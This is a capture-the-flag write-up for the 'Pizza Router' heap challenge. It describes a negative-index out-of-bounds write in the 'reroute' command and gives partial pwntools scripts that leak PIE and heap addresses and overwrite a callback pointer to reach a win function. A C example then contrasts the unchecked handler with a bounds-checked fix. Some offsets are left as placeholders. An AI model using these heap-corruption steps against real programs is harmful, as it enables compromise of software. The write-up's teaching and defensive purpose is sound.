Pizza Router

Published: March 20, 2026

Description

Plan the fastest pizza drone routes and snag a slice of the flag. Download `router` plus `city1.map`, `city2.map`, and `city3.map`, then optimize the delivery path.

Download router and the map files (city1.map, city2.map, city3.map).

Run the binary and understand what input format it expects.

chmod +x router
./router city1.map

Solution

  1. Step 1: Identify the OOB write in the reroute command
    The binary has a `reroute <id> <new_index>` command that stores a signed integer index without bounds checking. A negative index writes out-of-bounds on the heap, allowing you to corrupt adjacent heap metadata and overwrite heap pointers. This is the core vulnerability.
    chmod +x router
    ./router city1.map
    # Commands available: route, reroute, replay, receipt, dispatch, finish
  2. Step 2: Leak PIE base and heap address
    Use the `replay <id>` command to leak a binary address at heap offset +0x2260 (PIE base). Use the `receipt <id>` command to leak a heap pointer. Compute PIE base from the leaked address.
    python3 << 'EOF'
    from pwn import *

    p = remote("<HOST>", <PORT_FROM_INSTANCE>)
    # or: p = process(["./router", "city1.map"])

    # Trigger route allocation
    p.sendlineafter(b"> ", b"route 0 1")  # create a route entry

    # Leak PIE base via replay command (reads heap + 0x2260)
    p.sendlineafter(b"> ", b"replay 0")
    leak_data = p.recvline()
    pie_leak = int(leak_data.split()[-1], 16)
    pie_base = pie_leak - 0x2260  # adjust offset from binary analysis
    log.info(f"PIE base: {hex(pie_base)}")

    # Leak heap pointer via receipt command
    p.sendlineafter(b"> ", b"receipt 0")
    heap_data = p.recvline()
    heap_leak = int(heap_data.split()[-1], 16)
    heap_base = heap_leak - 0x???  # adjust offset
    log.info(f"Heap base: {hex(heap_base)}")
    EOF
  3. Step 3: Overwrite the finish callback at heap offset +0x430
    Using the OOB write via `reroute` with a negative index, overwrite the `finish` callback function pointer stored at heap offset +0x430 with the address of the win function or a one_gadget. Then call `dispatch` to trigger the overwritten callback.
    python3 << 'EOF'
    from pwn import *

    p = remote("<HOST>", <PORT_FROM_INSTANCE>)

    # After leaking addresses, compute the target and payload
    win_addr = pie_base + 0x????  # address of win/print_flag function

    # Negative index for OOB write -- reroute <id> <negative_idx>
    # The exact offset depends on heap layout analysis
    p.sendlineafter(b"> ", f"reroute 0 -<OFFSET>".encode())

    # Write win_addr bytes into the finish callback slot at +0x430
    # Trigger the overwritten callback
    p.sendlineafter(b"> ", b"dispatch")
    print(p.recvall())
    EOF

Flag

picoCTF{p1zz4_r0ut3r_...}

Pizza Router is a heap exploitation challenge. The `reroute` command uses a signed index without bounds checking -- a negative value performs an OOB write on the heap. Leak PIE base via `replay` (offset +0x2260) and heap via `receipt`, then overwrite the `finish` callback at offset +0x430 and call `dispatch` to win.
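
The root cause named above, an unchecked signed index in `reroute`, shown next to a bounds-checked handler. This is an added C example, not code recovered from the challenge binary; the `struct route` layout, `MAX_STOPS`, and every function name are assumptions made for illustration.

```c
#include <errno.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

#define MAX_STOPS 16              /* assumed capacity, not taken from the binary */

struct route {                    /* hypothetical layout for illustration */
    int    stops[MAX_STOPS];
    size_t count;                 /* slots currently in use (<= MAX_STOPS) */
};

/* Pattern the write-up describes: signed index, no range check.
   A negative idx addresses heap memory in front of the object. */
void reroute_unchecked(struct route *r, int idx, int value)
{
    r->stops[idx] = value;
}

/* Strict parse: the whole string must be a decimal in [0, limit). */
int parse_index(const char *s, size_t limit, size_t *out)
{
    char *end;
    errno = 0;
    long v = strtol(s, &end, 10);
    if (end == s || *end != '\0' || errno == ERANGE)
        return -1;                /* empty, trailing junk, or overflow */
    if (v < 0 || (unsigned long)v >= limit)
        return -1;                /* negative or past the last used slot */
    *out = (size_t)v;
    return 0;
}

/* Hardened handler: the write happens only after the index is validated. */
int reroute_checked(struct route *r, const char *idx_arg, int value)
{
    size_t idx;
    if (parse_index(idx_arg, r->count, &idx) != 0)
        return -1;
    r->stops[idx] = value;
    return 0;
}

int main(void)
{
    struct route r = { {0}, 4 };  /* constructed sample: 4 slots in use */
    printf("idx 2  -> %d\n", reroute_checked(&r, "2", 7));
    printf("idx -1 -> %d\n", reroute_checked(&r, "-1", 9));
    return 0;
}
```

Converting to an unsigned type only after the range check matters: casting a negative value first would turn it into a huge index, which the upper-bound comparison then has to catch on its own.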